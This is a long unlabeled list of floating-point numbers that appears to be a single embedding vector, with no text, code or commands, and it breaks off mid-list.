[ -0.03215079382061958, 0.03845258429646492, -0.01670265942811966, -0.01607539691030979, -0.00444553280249238, -0.012924502603709698, -0.03130472078919411, 0.04878051578998566, -0.024448607116937637, 0.07346252351999283, 0.025951117277145386, -0.022333424538373947, 0.0014514537760987878, -0.02087467722594738, -0.0033222974743694067, -0.012063841335475445, -0.0031873632688075304, 0.005218669306486845, -0.03098379634320736, -0.00015499192522838712, 0.015477310866117477, -0.029452111572027206, 0.01260357815772295, 0.016104571521282196, 0.006626360584050417, 0.025396794080734253, -0.022085437551140785, 0.028168413788080215, -0.02215837500989437, 0.020437052473425865, 0.010371694341301918, 0.015987873077392578, -0.004234014544636011, 0.02608240395784378, 0.05190223455429077, -0.007578193210065365, 0.035593438893556595, 0.0520772859454155, -0.010823906399309635, -0.011742916889488697, -0.018132230266928673, -0.019109591841697693, -0.037869084626436234, 0.016469258815050125, -0.005772992968559265, 0.017038170248270035, -0.012771334499120712, 0.010320638306438923, -0.03372624143958092, -0.00280991243198514, 0.000832397781778127, -0.03346366807818413, -0.013106846250593662, -0.03279264271259308, 0.008716016076505184, -0.018496917560696602, 0.04632981866598129, -0.02829970046877861, 0.00415013637393713, 0.03489324077963829, -0.005331722088158131, 0.010043476708233356, -0.006418488919734955, 0.049451541155576706, 0.03836505860090256, 0.009401627816259861, 0.0024671065621078014, 0.01350800134241581, 0.00187813735101372, 0.02205626107752323, 0.021195601671934128, -0.004361655097454786, 0.030546171590685844, -0.013551764190196991, -0.01374140102416277, -0.05715372785925865, 0.04586302116513252, 0.006692003924399614, 0.0030834274366497993, 0.03877350687980652, -0.05464468151330948, 0.03439726680517197, -0.02923329919576645, 0.0014204554026946425, 0.02581983059644699, 0.01030605100095272, -0.0725872740149498, -0.04948071390390396, -0.028270525857806206, -0.014507243409752846, 0.00752713717520237, 0.007206212729215622, 0.036001887172460556, -0.023267021402716637, 0.008438854478299618, 0.021924974396824837, -0.011122949421405792, 0.01077285036444664, -0.05216480791568756, -0.04758434370160103, -0.006994694005697966, 0.018730318173766136, -0.026563791558146477, 0.00007071506115607917, 0.030225247144699097, 0.009474565275013447, 0.05727042630314827, -0.021122664213180542, 0.013012027367949486, 0.10543826967477798, 0.0028299700934439898, 0.01587117277085781, 0.01794259436428547, 0.0023649942595511675, 0.006082977168262005, -0.025455143302679062, -0.035126637667417526, -0.027497390285134315, -0.003681513946503401, 0.012020079419016838, 0.03845258429646492, -0.006396607495844364, -0.02835805155336857, 0.030808746814727783, -0.013267308473587036, 0.054615505039691925, -0.03253006935119629, 0.012151366099715233, -0.01409879419952631, 0.006826938129961491, -0.05298170819878578, -0.02113725058734417, -0.03576848655939102, -0.016017047688364983, 0.026067817583680153, 0.004751869942992926, -0.030867096036672592, 0.01592952199280262, -0.012253479100763798, 0.02608240395784378, -0.020845500752329826, -0.02783290110528469, 0.017490381374955177, -0.023237846791744232, 0.0015417137183248997, -0.005568768363445997, 0.0008492645574733615, 0.01896371692419052, -0.029247887432575226, 0.013420476578176022, 0.005375484470278025, 0.005255137570202351, 0.007753242738544941, 0.007760536391288042, 0.004069905262440443, 0.02406933344900608, 0.008752484805881977, 0.009722552262246609, 0.004839394707232714, -0.014886518009006977, 0.01576906070113182, -0.03489324077963829, 0.014288431964814663, 0.0022756459657102823, 0.002479870803654194, -0.036877136677503586, 0.027555739507079124, 0.012464997358620167, 0.007093159481883049, 0.014514537528157234, 0.003513758070766926, -0.027249403297901154, 0.016571370884776115, 0.0040006148628890514, -0.03165481984615326, -0.03783990815281868, -0.0067321197129786015, 0.004069905262440443, -0.023777583613991737, -0.009073409251868725, -0.04679661989212036, 0.00093906867550686, -0.01670265942811966, -0.0012125838547945023, 0.020947614684700966, -0.014886518009006977, 0.048897214233875275, -0.04892639070749283, 0.0332886166870594, -0.030283598229289055, 0.018015531823039055, 0.04411252215504646, 0.017898831516504288, 0.002171710366383195, 0.03480571508407593, -0.0005397365894168615, -0.01435407530516386, -0.05076441168785095, -0.007319265510886908, -0.003552050096914172, 0.009751726873219013, -0.01613374799489975, -0.000867498863954097, -0.04303305223584175, -0.04898473992943764, 0.00876707211136818, -0.018978305160999298, 0.024244382977485657, -0.025863593444228172, -0.033171918243169785, -0.0618508942425251, -0.04160347953438759, 0.035739313811063766, 0.024550719186663628, -0.022639760747551918, 0.001516185700893402, -0.024725770577788353, -0.012224303558468819, -0.012968265451490879, 0.02866438776254654, 0.009365159086883068, -0.005550533998757601, 0.01743203215301037, 0.0018097585998475552, -0.031363070011138916, -0.01953262835741043, -0.024215208366513252, 0.006473192013800144, 0.017504969611763954, 0.02685554139316082, 0.027293166145682335, 0.021020550280809402, -0.009620439261198044, 0.01721321977674961, 0.0052478439174592495, 0.00259657041169703, -0.0022628819569945335, -0.026374153792858124, 0.013668463565409184, 0.021151838824152946, -0.02211461216211319, 0.021939562633633614, -0.01342777069658041, -0.0016009754035621881, -0.006520600989460945, 0.07422107458114624, -0.013486120849847794, 0.044054172933101654, -0.006323670502752066, 0.011925260536372662, -0.0010730910580605268, 0.011531398631632328, 0.016717245802283287, -0.006422135978937149, -0.047234244644641876, 0.032705117017030716, -0.00904423464089632, 0.021356062963604927, -0.016673482954502106, -0.03883185610175133, -0.002884673187509179, -0.01401856355369091, -0.004263189621269703, -0.012676515616476536, 0.03299686685204506, -0.024813294410705566, -0.020918438211083412, 0.016892295330762863, 0.004937860183417797, -0.01943051628768444, -0.049072265625, -0.00397143978625536, -0.00925575289875269, 0.015404373407363892, 0.0007840767502784729, 0.002875556005164981, -0.00021698868658859283, 0.0006486867787316442, -0.002098772907629609, 0.01332565862685442, -0.037956610321998596, -0.0027898545376956463, 0.009007765911519527, 0.011451167985796928, 0.010721794329583645, -0.031012970954179764, -0.008030405268073082, -0.007928292267024517, -0.03515581414103508, 0.012494171969592571, 0.029758447781205177, 0.0302544217556715, -0.011297998949885368, 0.016615133732557297, 0.0011633511167019606, 0.008511791937053204, -0.00009880735160550103, 0.018526092171669006, -0.00664824154227972, 0.03127554431557655, -0.041253380477428436, 0.024565307423472404, 0.005929808598011732, -0.005029032006859779, -0.043120574206113815, -0.004591407719999552, -0.016104571521282196, 0.01716945692896843, -0.009372452273964882, -0.03118802048265934, 0.04653404280543327, -0.04317892715334892, -0.03798578307032585, 0.03474736586213112, -0.013537176884710789, 0.010998955927789211, 0.051318734884262085, -0.004697166848927736, -0.029933497309684753, 0.003462701803073287, 0.021560287103056908, 0.03104214556515217, -0.043529026210308075, 0.026417916640639305, -0.01753414422273636, -0.0426829494535923, -0.0055432403460145, 0.002062304178252816, -0.016017047688364983, 0.03098379634320736, 0.031625647097826004, 0.02329619787633419, 0.007621955592185259, -0.0002030850009759888, 0.012785921804606915, -0.012610872276127338, -0.028314288705587387, -0.009802782908082008, 0.0423620268702507, -0.02319408394396305, -0.01798635721206665, -0.01772378198802471, 0.032909344881772995, 0.0010639739921316504, 0.0063273170962929726, 0.013136020861566067, -0.010058064013719559, 0.033697064965963364, 0.033171918243169785, 0.007417730987071991, 0.0009267604909837246, -0.01674642041325569, 0.005813108757138252, 0.009686083532869816, -0.004179311450570822, -0.0011387347476556897, 0.007209859322756529, -0.021939562633633614, 0.001269110362045467, -0.022566823288798332, 0.012618165463209152, -0.030896270647644997, 0.01902206800878048, 0.009117172099649906, -0.013456945307552814, 0.021297713741660118, -0.04274130240082741, -0.011429286561906338, -0.016148334369063377, -0.01515638642013073, 0.009489152580499649, 0.008278392255306244, -0.03127554431557655, 0.01177938561886549, -0.016469258815050125, 0.008044992573559284, 0.01845315471291542, 0.002452519256621599, -0.021560287103056908, 0.016046222299337387, -0.0544404573738575, 0.01154598593711853, 0.057708051055669785, -0.03824836015701294, 0.0023358194157481194, 0.01938675343990326, -0.004248601850122213, 0.04148677736520767, -0.04551292210817337, -0.041107505559921265, -0.004237661603838205, 0.006805057171732187, -0.026461679488420486, -0.014952161349356174, -0.03436809033155441, 0.01433219388127327, -0.04933483898639679, -0.00026371420244686306, -0.004303304944187403, -0.01891995407640934, 0.04192440211772919, -0.0026877422351390123, 0.0022209431044757366, 0.05581167712807655, -0.013143314979970455, 0.025659367442131042, 0.000889380113221705, -0.006713885348290205, 0.011815854348242283, -0.004157430492341518, 0.0016885001678019762, 0.0006272614118643105, -0.009722552262246609, -0.02164781279861927, 0.009810077026486397, -0.008993178606033325, -0.016162922605872154, 0.012399353086948395, -0.030954621732234955, 0.029729273170232773, 0.003395234700292349, 0.0021990619134157896, -0.0021954148542135954, -0.008365917019546032, 0.01824893057346344, 0.0071113938465714455, 0.007483374327421188, 0.01576906070113182, 0.04898473992943764, -0.01711110770702362, 0.04349984973669052, -0.036060236394405365, -0.014310312457382679, -0.015506485477089882, 0.03880268335342407, -0.003938618116080761, -0.03112967126071453, -0.021764513105154037, -0.00751254940405488, 0.009416215121746063, -0.021793687716126442, 0.022202135995030403, 0.001220789272338152, 0.011232355609536171, 0.04618394374847412, -0.033842939883470535, -0.060275446623563766, -0.04676744341850281, 0.04145760461688042, -0.0246965941041708, 0.02557184360921383, 0.06284283846616745, -0.005813108757138252, -0.013559057377278805, -0.018467742949724197, -0.008358622901141644, 0.005397365894168615, -0.002419697353616357, 0.03366789221763611, 0.025805242359638214, 0.013223545625805855, -0.0020130714401602745, 0.020991375669836998, 0.020582927390933037, 0.04174935445189476, -0.03092544712126255, -0.03010854870080948, 0.0010931488359346986, 0.01680477149784565, -0.011888791806995869, -0.00006211073196027428, 0.029422936961054802, 0.0079866424202919, 0.004073552321642637, -0.018642792478203773, 0.020378701388835907, 0.011181299574673176, -0.04808031767606735, -0.0018690201686695218, -0.031421419233083725, -0.01028416957706213, -0.017869656905531883, 0.03139224648475647, 0.024215208366513252, -0.03031277284026146, -0.014623943716287613, -0.02072880230844021, -0.030867096036672592, -0.002385052153840661, -0.005517712328583002, 0.005466656293720007, -0.029291648417711258, 0.0048685697838664055, 0.0010475630406290293, 0.02990432269871235, 0.03401799127459526, -0.002251941477879882, 0.01660054549574852, 0.013726813718676567, -0.02758491411805153, 0.00393132446333766, -0.017665432766079903, -0.015433548018336296, -0.006141326855868101, 0.04959741234779358, -0.013114139437675476, -0.028328875079751015, 0.03623528778553009, -0.028474749997258186, 0.008781659416854382, -0.02644709125161171, 0.030546171590685844, -0.02567395567893982, -0.010101825930178165, 0.003395234700292349, -0.023690059781074524, 0.015623185783624649, 0.006717531941831112, 0.01824893057346344, 0.005317134782671928, -0.005667233839631081, -0.009642320685088634, -0.02541138045489788, 0.02329619787633419, -0.005656293127685785, -0.010364401154220104, -0.019109591841697693, -0.014317606575787067, 0.025440555065870285, 0.003612223546952009, -0.04072823002934456, -0.008716016076505184, -0.009656907990574837, 0.014186318963766098, 0.002680448582395911, 0.017402857542037964, -0.02341289632022381, 0.003880268195644021, -0.0010977074271067977, 0.007249975111335516, -0.029773036018013954, 0.05216480791568756, -0.044812723994255066, 0.030808746814727783, -0.039094433188438416, -0.005138438194990158, 0.0240255706012249, 0.00030747661367058754, 0.008292979560792446, -0.026884716004133224, -0.041515953838825226, -0.015608597546815872, 0.00984654575586319, -0.013106846250593662, 0.009737139567732811, -0.0059480429627001286, 0.046475693583488464, -0.00043352151988074183, 0.030487822368741035, -0.015914935618638992, -0.00018747184367384762, 0.016046222299337387, 0.005346309393644333, -0.017811305820941925, 0.001543537131510675, -0.0018471389776095748, -0.007643836550414562, 0.012413941323757172, -0.03792743384838104, 0.0018945483025163412, 0.0013219899265095592, 0.005656293127685785, 0.02329619787633419, 0.014390544034540653, -0.007906411774456501, 0.004729988519102335, 0.029349999502301216, 0.005944395903497934, -0.025965705513954163, 0.0014569240156561136, 0.011793972924351692, -0.010575919412076473, -0.002315761521458626, 0.004004261922091246, 0.02138523757457733, -0.012720277532935143, -0.0033770003356039524, -0.007782417815178633, -0.030487822368741035, -0.011414699256420135, -0.023748409003019333, 0.0030633697751909494, -0.002848204458132386, -0.0453670471906662, 0.013697639107704163, -0.01123964972794056, -0.002315761521458626, 0.016513021662831306, 0.007716774009168148, 0.0038474465254694223, -0.0507352389395237, 0.049568239599466324, -0.0013301953440532088, -0.031975746154785156, -0.0019328404450789094, -0.017928006127476692, 0.00762924924492836, 0.009029647335410118, -0.04592137038707733, 0.014850049279630184, 0.001972955884411931, 0.023471247404813766, 0.0651768371462822, -0.012144072912633419, 0.014390544034540653, 0.0022318835835903883, 0.025557255372405052, -0.011115655303001404, 0.016250446438789368, 0.010933312587440014, -0.0017696430440992117, -0.04437509924173355, 0.052193984389305115, -0.022595997899770737, 0.013683050870895386, 0.026505442336201668, 0.01686312071979046, -0.012953677214682102, 0.0027843841817229986, -0.013872688636183739, -0.024506958201527596, 0.016615133732557297, -0.001698529114946723, -0.036001887172460556, -0.02758491411805153, -0.026986828073859215, 0.023850521072745323, -0.024448607116937637, -0.01686312071979046, 0.007891823537647724, -0.04694249480962753, 0.011684567667543888, -0.010605094023048878, 0.04880969226360321, -0.02695765346288681, 0.021005963906645775, 0.0010129177244380116, -0.008125223219394684, 0.01064156275242567, 0.007425024639815092, -0.03174234554171562, -0.0551406554877758, 0.032034095376729965, 0.02139982581138611, 0.020860088989138603, -0.03282181918621063, -0.004219427239149809, 0.032500892877578735, -0.00658624479547143, -0.012494171969592571, -0.01512721087783575, -0.023675471544265747, -0.012844271957874298, -0.02417144551873207, -0.011254237033426762, 0.025440555065870285, -0.0007617396768182516, 0.00881083495914936, -0.01613374799489975, 0.009788195602595806, 0.02516339346766472, -0.021968737244606018, 0.03416386619210243, -0.007239034399390221, -0.004463767167180777, -0.00046816677786409855, -0.0014450717717409134, -0.003880268195644021, -0.012997440062463284, -0.018059294670820236, -0.02237718552350998, 0.017563318833708763, -0.013850807212293148, -0.007012928370386362, -0.0024816941004246473, 0.013952919282019138, -0.02221672423183918, -0.01906582899391651, -0.018278105184435844, -0.0474092923104763, 0.028678975999355316, -0.002984961960464716, 0.005357250105589628, 0.039152782410383224, -0.006232498679310083, -0.007716774009168148, -0.00035921655944548547, 0.004135549068450928, -0.01549189817160368, 0.006677416618913412, -0.04449179768562317, -0.000011154289495607372, 0.0051238504238426685, -0.0289123747497797, -0.011487636715173721, 0.006768588442355394, -0.007950173690915108, -0.0031508945394307375, -0.007519843056797981, 0.027657851576805115, 0.011064599268138409, 0.008482616394758224, 0.035184990614652634, 0.005528653040528297, -0.02227507345378399, -0.004037083592265844, 0.009824664331972599, -0.023267021402716637, -0.010583212599158287, 0.0037179826758801937, 0.002895613666623831, -0.006721179001033306, -0.007585486862808466, -0.013828925788402557, -0.019882727414369583, 0.007716774009168148, 0.023223260417580605, 0.039152782410383224, -0.009423508308827877, 0.00788453035056591, -0.01973685249686241, -0.047350943088531494, 0.009547501802444458, 0.014828167855739594, -0.005196787882596254, -0.00892024114727974, -0.0014332194114103913, 0.014346781186759472, 0.004339773673564196, 0.004762810654938221, 0.0032821819186210632, 0.003462701803073287, -0.011283411644399166, -0.04104915261268616, 0.01763625629246235, -0.005273371934890747, 0.0029247887432575226, 0.012333709746599197, -0.04347067326307297, -0.011254237033426762, 0.022129198536276817, 0.02315032295882702, 0.02561560645699501, -0.016206683591008186, 0.015083448961377144, -0.00922657735645771, 0.016279621049761772, 0.0022428242955356836, 0.007972055114805698, -0.005623471457511187, -0.0016091808211058378, 0.012610872276127338, -0.004080845974385738, 0.012931796722114086, -0.014361368492245674, -0.010043476708233356, 0.005306194070726633, 0.0033551191445440054, 0.015739886090159416, -0.022610586136579514, -0.018876193091273308, -0.002727857790887356, -0.006068389397114515, -0.028372637927532196, 0.011217768304049969, -0.002011248143389821, -0.01327460166066885, 0.01727157086133957, -0.017957180738449097, 0.007534430827945471, -0.01660054549574852, 0.009912189096212387, -0.030750397592782974, 0.02392345853149891, 0.003887562081217766, -0.01482087466865778, 0.04282882437109947, -0.003433526959270239, -0.004897744860500097, -0.011195886880159378, 0.01005076989531517, 0.0052004349417984486, 0.03792743384838104, -0.03877350687980652, 0.01619209721684456, -0.012107604183256626, 0.022975273430347443, 0.0336095429956913, -0.033230267465114594, -0.007465140428394079, 0.015798235312104225, 0.006031920667737722, -0.0039532058872282505, -0.02439025789499283, -0.04799279198050499, -0.0028226764407008886, -0.028110064566135406, 0.0029229652136564255, -0.01810305565595627, 0.03133389726281166, -0.020845500752329826, -0.007020222023129463, 0.0028664388228207827, 0.014602062292397022, -0.01169915497303009, 0.004631523042917252, 0.017665432766079903, 0.00984654575586319, -0.024521544575691223, 0.03509746491909027, -0.01994107849895954, 0.008840009570121765, 0.003630457678809762, -0.009087996557354927, 0.007169743999838829, -0.032909344881772995, 0.009452683851122856, 0.009598558768630028, 0.0295833982527256, 0.030137723311781883, 0.005958983208984137, -0.017154870554804802, -0.04323727637529373, 0.009532914496958256, -0.01912418007850647, 0.05268995836377144, -0.0067321197129786015, 0.001640179194509983, -0.04262460023164749, 0.008540966548025608, -0.052602432668209076, 0.016002459451556206, -0.010101825930178165, -0.03395964205265045, -0.008519085124135017, -0.0277307890355587, 0.005072794388979673, -0.02490082010626793, 0.012209716252982616, -0.00024616363225504756, 0.016002459451556206, 0.008176279254257679, 0.013916450552642345, 0.032034095376729965, -0.018278105184435844, 0.0030761337839066982, -0.0002038827515207231, -0.006447663996368647, 0.01871572993695736, -0.02767243981361389, 0.042916350066661835, -0.0022774694953113794, -0.03145059570670128, -0.00166206038556993, 0.003894855733960867, -0.0005101057467982173, -0.006002746056765318, -0.043587375432252884, -0.011064599268138409, -0.0026056875940412283, -0.011896085925400257, -0.029714686796069145, 0.0011551456991583109, -0.005608884152024984, -0.008679547347128391, 0.00794287957251072, -0.006042861379683018, 0.002840910805389285, 0.004379889462143183, 0.00832215417176485, 0.00963502749800682, -0.0023285257630050182, -0.012122191488742828, -0.02298985980451107, 0.027701614424586296, -0.02227507345378399, 0.015841998159885406, -0.028591450303792953, -0.012508759275078773, 0.006604479160159826, -0.013872688636183739, -0.027176465839147568, -0.025586429983377457, 0.028533101081848145, -0.013260014355182648, 0.0013010203838348389, -0.01613374799489975, -0.031012970954179764, -0.012209716252982616, -0.046358995139598846, -0.010524863377213478, 0.0013219899265095592, -0.005579709075391293, -0.0220125000923872, -0.006779528688639402, -0.002928435569629073, 0.024244382977485657, -0.0166443083435297, -0.007166096940636635, 0.002120654098689556, -0.008008523844182491, -0.0015353317139670253, 0.007140568923205137, -0.007341146469116211, -0.025396794080734253, -0.010575919412076473, -0.024098508059978485, 0.013128727674484253, -0.0009627733379602432, 0.05928349867463112, 0.005397365894168615, 0.01644008420407772, 0.006848819553852081, 0.03635198622941971, -0.004259542562067509, -0.02803712710738182, -0.0017887890571728349, 0.0052369036711752415, 0.015418960712850094, -0.002984961960464716, 0.0044127111323177814, -0.012158660218119621, -0.011451167985796928, 0.01492298673838377, 0.020816326141357422, -0.0352725125849247, 0.017548732459545135, 0.02042246423661709, -0.0018544327467679977, -0.06091729551553726, 0.008183573372662067, 0.005495830904692411, 0.0012362884590402246, -0.011640804819762707, 0.0016237682430073619, 0.011268824338912964, -0.0129390899091959, 0.0104154571890831, -0.030341947451233864, -0.019299229606986046, 0.0029703746549785137, -0.03267594426870346, -0.02097678929567337, -0.023077385500073433, -0.02860603854060173, 0.01638173498213291, -0.0235150083899498, -0.027045177295804024, -0.014222787693142891, 0.005886046215891838, 0.006516954395920038, 0.02510504424571991, -0.006568010430783033, -0.01705275848507881, -0.025338442996144295, -0.00479563232511282, -0.030283598229289055, 0.012078428640961647, -0.009583970531821251, -0.019576391205191612, 0.012464997358620167, -0.02144358865916729, -0.007053044158965349, 0.049714114516973495, -0.008344035595655441, 0.041311729699373245, -0.015710709616541862, -0.01810305565595627, -0.013602820225059986, -0.016819357872009277, -0.004354361444711685, -0.047817740589380264, 0.021983323618769646, -0.038890209048986435, 0.0015708886785432696, -0.014864636585116386, 0.008285685442388058, 0.012618165463209152, -0.0028190293814986944, -0.012880739755928516, 0.013442358002066612, 0.033376142382621765, 0.020014015957713127, -0.0581456758081913, 0.033638715744018555, 0.0038693277165293694, 0.017300745472311974, -0.009664202108979225, 0.001152410521171987, -0.0520772859454155, -0.02577606774866581, 0.00001743659049679991, -0.025630192831158638, -0.0004622405976988375, 0.01317248959094286, 0.00914634671062231, -0.0010174763156101108, 0.036672912538051605, -0.03547674044966698, 0.00014712836127728224, -0.005630765110254288, -0.004102727398276329, 0.012384765781462193, -0.003821918275207281, -0.013179783709347248, 0.01922629214823246, -0.002552808029577136, 0.008526379242539406, 0.018482331186532974, 0.018599029630422592, -0.008008523844182491, -0.013792457059025764, 0.007592780515551567, 0.007373968604952097, 0.010225819423794746, 0.02103513851761818, -0.0026950358878821135, -0.0004093610041309148, 0.009985126554965973, 0.0584665983915329, 0.004613288678228855, 0.009029647335410118, -0.00038269328069873154, 0.012041960842907429, 0.006582598201930523, -0.016790183261036873, 0.0035465797409415245, -0.025542668998241425, -0.005411953199654818, -0.011852323077619076, 0.01763625629246235, 0.009722552262246609, -0.05021008849143982, -0.009452683851122856, -0.0038839152548462152, 0.02158946357667446, 0.011458461172878742, 0.010590506717562675, -0.01902206800878048, -0.015798235312104225, 0.009241165593266487, 0.0011268823873251677, 0.04632981866598129, -0.019561802968382835, 0.007053044158965349, -0.011181299574673176, -0.017242394387722015, -0.0015462723094969988, 0.012187834829092026, 0.01224618498235941, -0.013165196403861046, -0.026213692501187325, -0.001967485761269927, -0.008650372736155987, -0.014142557047307491, -0.008263804018497467, -0.007286443840712309, 0.01660054549574852, -0.013836219906806946, 0.004591407719999552, -0.009117172099649906, 0.016936058178544044, -0.014011269435286522, -0.014769818633794785, 0.016308797523379326, -0.02026200294494629, 0.007636542897671461, -0.015856584534049034, 0.0035538736265152693, -0.03031277284026146, -0.01865738071501255, -0.018599029630422592, 0.006939990911632776, 0.0015635949093848467, -0.03886103257536888, 0.0013985740952193737, -0.0052004349417984486, -0.0265492033213377, 0.014397837221622467, -0.008271098136901855, -0.01943051628768444, -0.022610586136579514, -0.007348440587520599, -0.011166712269186974, -0.01674642041325569, 0.009999713860452175, -0.0023577006068080664, 0.06949473172426224, 0.029962673783302307, -0.003336884779855609, -0.0021188308019191027, -0.0049123321659862995, -0.028226763010025024, 0.003353295847773552, 0.014419718645513058, 0.004642463754862547, -0.012151366099715233, 0.036672912538051605, -0.01374140102416277, -0.006261673755943775, 0.00013937876792624593, 0.02050998993217945, 0.0004043465596623719, 0.0014696880243718624, -0.0017514086794108152, 0.010838493704795837, 0.02139982581138611, 0.014740643091499805, 0.011385523714125156, 0.007556311786174774, -0.013143314979970455, 0.013238132931292057, -0.027278577908873558, 0.015418960712850094, -0.008905652910470963, -0.006491426378488541, -0.013493414036929607, -0.020116128027439117, -0.005922514945268631, -0.015535661019384861, -0.0018626381643116474, -0.004923272877931595, 0.006389313843101263, 0.012122191488742828, 0.0025947471149265766, -0.0021315948106348515, -0.020116128027439117, 0.007056690752506256, -0.00003319220195407979, 0.010116414166986942, -0.022756461054086685, -0.009036940522491932, -0.03045864775776863, 0.04066988080739975, 0.009810077026486397, -0.019153354689478874, -0.025192568078637123, -0.0021990619134157896, -0.017198633402585983, 0.013026614673435688, 0.047613516449928284, -0.0008829981088638306, 0.015170973725616932, -0.0005046354490332305, 0.000889380113221705, 0.00438353605568409, -0.036264460533857346, 0.022552235051989555, 0.005521359387785196, 0.016265034675598145, 0.014558299444615841, 0.01975144073367119, -0.023777583613991737, -0.02252306044101715, 0.00951103400439024, -0.0005123850423842669, 0.002474400447681546, 0.006396607495844364, -0.029058249667286873, 0.014551006257534027, -0.006498720031231642, 0.024258971214294434, 0.03676043823361397, -0.023339958861470222, -0.007877236232161522, -0.030283598229289055, -0.028372637927532196, 0.029831385239958763, 0.020553752779960632, -0.000587145856115967, 0.00474092923104763, -0.002062304178252816, -0.00963502749800682, -0.0019474278669804335, 0.013639288954436779, -0.00587875209748745, -0.017038170248270035, -0.005003503989428282, -0.00021858418767806143, 0.01283697783946991, 0.0019565450493246317, -0.0014423365937545896, 0.0020076013170182705, -0.00463881716132164, -0.019459690898656845, -0.007760536391288042, -0.02144358865916729, 0.01839480549097061, -0.005922514945268631, 0.03220914304256439, -0.003006843151524663, -0.02536761946976185, 0.021516526117920876, 0.007556311786174774, 0.005962630268186331, 0.0004542630922514945, 0.004277776926755905, -0.006214264314621687, 0.013391301967203617, 0.010838493704795837, -0.02752656489610672, -0.010561332106590271, -0.016265034675598145, -0.0025801595766097307, -0.01922629214823246, 0.013398595154285431, -0.024463195353746414, -0.022143786773085594, -0.013026614673435688, 0.010554037988185883, -0.023062797263264656, -0.006341904867440462, 0.0023741114418953657, -0.03702301159501076, -0.030137723311781883, 0.009999713860452175, 0.04058235511183739, 0.02809547632932663, 0.02077256329357624, 0.015637772157788277, -0.016265034675598145, 0.04180770367383957, -0.020801739767193794, 0.005244197323918343, 0.003692454658448696, 0.03334696590900421, 0.013077670708298683, -0.006002746056765318, 0.019809789955615997, -0.01512721087783575, 0.030079372227191925, 0.023237846791744232, -0.01906582899391651, -0.015637772157788277, 0.011268824338912964, 0.004339773673564196, -0.006360138766467571, 0.014127969741821289, -0.0005415600026026368, 0.02046622708439827, 0.016410909593105316, 0.017125695943832397, 0.009883014485239983, -0.0029612574726343155, -0.027701614424586296, -0.011881498619914055, 0.007563605438917875, -0.009671496227383614, 0.023442072793841362, 0.005973570980131626, -0.016469258815050125, -0.0007466963725164533, 0.021356062963604927, -0.012742158956825733, -0.022202135995030403, -0.03305521607398987, -0.020743388682603836, 0.011487636715173721, 0.008635785430669785, -0.03541838750243187, 0.0010475630406290293, -0.012873446568846703, 0.005021738354116678, -0.01757790707051754, -0.023529596626758575, -0.0016410909593105316, -0.001521655940450728, -0.009058821946382523, 0.03045864775776863, -0.010904137045145035, -0.004919625818729401, 0.04326644912362099, -0.023544184863567352, 0.00881083495914936, -0.010663444176316261, -0.007920999079942703, -0.00809604860842228, 0.01332565862685442, 0.026374153792858124, -0.026199104264378548, -0.0006532453699037433, -0.018438568338751793, -0.0035976360086351633, -0.004117314703762531, 0.015170973725616932, 0.0040079085156321526, -0.02510504424571991, 0.004128255415707827, 0.005714643280953169, -0.013362126424908638, -0.018059294670820236, 0.025542668998241425, -0.008037698455154896, 0.02881026268005371, 0.002715093782171607, -0.01613374799489975, -0.008424266241490841, -0.022800223901867867, -0.000427139486419037, 0.0072791497223079205, 0.02118101343512535, 0.002009424613788724, 0.015506485477089882, 0.018832430243492126, -0.0011834088945761323, 0.03314274176955223, 0.018234344199299812, -0.02953963726758957, 0.01603163406252861, -0.0002748827391769737, -0.002538220724090934, -0.022231310606002808, -0.006786822807043791, 0.03772320970892906, -0.0030560758896172047, -0.013486120849847794, 0.01877407915890217, 0.016775596886873245, 0.005342662800103426, 0.029349999502301216, -0.003030547872185707, -0.005794874392449856, -0.005991805344820023, -0.011487636715173721, 0.006604479160159826, 0.02061210200190544, -0.034455616027116776, -0.004832101054489613, 0.015375198796391487, -0.025703130289912224, 0.006692003924399614, -0.007435965351760387, -0.00018519254808779806, 0.024200620129704475, 0.02107890136539936, -0.01788424327969551, 0.030225247144699097, -0.01224618498235941, 0.00889106560498476, -0.004186605103313923, -0.009416215121746063, 0.0011514987563714385, 0.03334696590900421, 0.020641276612877846, -0.007136921864002943, 0.026155341416597366, -0.022960685193538666, -0.005977217573672533, -0.0031363070011138916, -0.020130714401602745, 0.01468958705663681, -0.02758491411805153, 0.013063083402812481, -0.0007043015211820602, -0.020320352166891098, -0.018161406740546227, 0.028678975999355316, -0.01751955784857273, -0.005484890658408403, -0.00892024114727974, 0.008613904006779194, -0.012829683721065521, 0.004153783433139324, -0.006801410112529993, -0.01123964972794056, -0.010488394647836685, 0.005714643280953169, 0.004627876449376345, 0.0238651093095541, -0.00047454878222197294, 0.004554938990622759, -0.008416973054409027, 0.01399668212980032, -0.018599029630422592, -0.025601018220186234, -0.007373968604952097, -0.022100023925304413, 0.020962201058864594, -0.0001173835844383575, -0.010444631800055504, -0.02530926838517189, 0.007461493369191885, 0.007352087181061506, -0.01762166991829872, 0.036060236394405365, 0.018278105184435844, -0.026724252849817276, 0.01727157086133957, 0.007775124162435532, 0.007775124162435532, -0.004682579543441534, 0.005798520985990763, -0.0012454056413844228, -0.009992420673370361, -0.019299229606986046, 0.021297713741660118, 0.011203180998563766, 0.01468958705663681, -0.03133389726281166, -0.01118859276175499, -0.02144358865916729, -0.00034987146500498056, 0.009934070520102978, -0.017855068668723106, 0.022668935358524323, 0.017504969611763954, -0.0033040631096810102, 0.02422979474067688, 0.017548732459545135, 0.007789711467921734, -0.030283598229289055, -0.00009795261576073244, -0.01020393893122673, 0.012807803228497505, 0.01751955784857273, 0.024769531562924385, 0.005849577486515045, 0.0034098222386091948, 0.01578364707529545, 0.026169929653406143, -0.012319122441112995, 0.01706734485924244, -0.009000471793115139, 0.007147862575948238, 0.020860088989138603, -0.024113096296787262, -0.01870114356279373, -0.021662399172782898, 0.019547216594219208, -0.022960685193538666, -0.0023230554070323706, 0.006170501932501793, -0.010240407660603523, 0.018671967089176178, 0.043937474489212036, -0.02134147472679615, -0.0043288329616189, -0.005401012487709522, -0.0021024197340011597, -0.027657851576805115, -0.01538978610187769, 0.011487636715173721, 0.01814681850373745, 0.0011250589741393924, 0.0049925632774829865, -0.015375198796391487, -0.009883014485239983, -0.008183573372662067, 0.0012144072679802775, 0.005444774869829416, -0.006498720031231642, -0.008643078617751598, 0.02422979474067688, -0.01763625629246235, -0.005787580739706755, -0.011494929902255535, -0.014390544034540653, 0.00004347751382738352, -0.006042861379683018, -0.024550719186663628, 0.016979821026325226, 0.0016018870519474149, 0.028255939483642578, 0.020174477249383926, -0.0201598908752203, -0.02042246423661709, 0.02608240395784378, -0.009029647335410118, -0.03285099193453789, 0.026768015697598457, -0.011808561161160469, -0.03696466237306595, 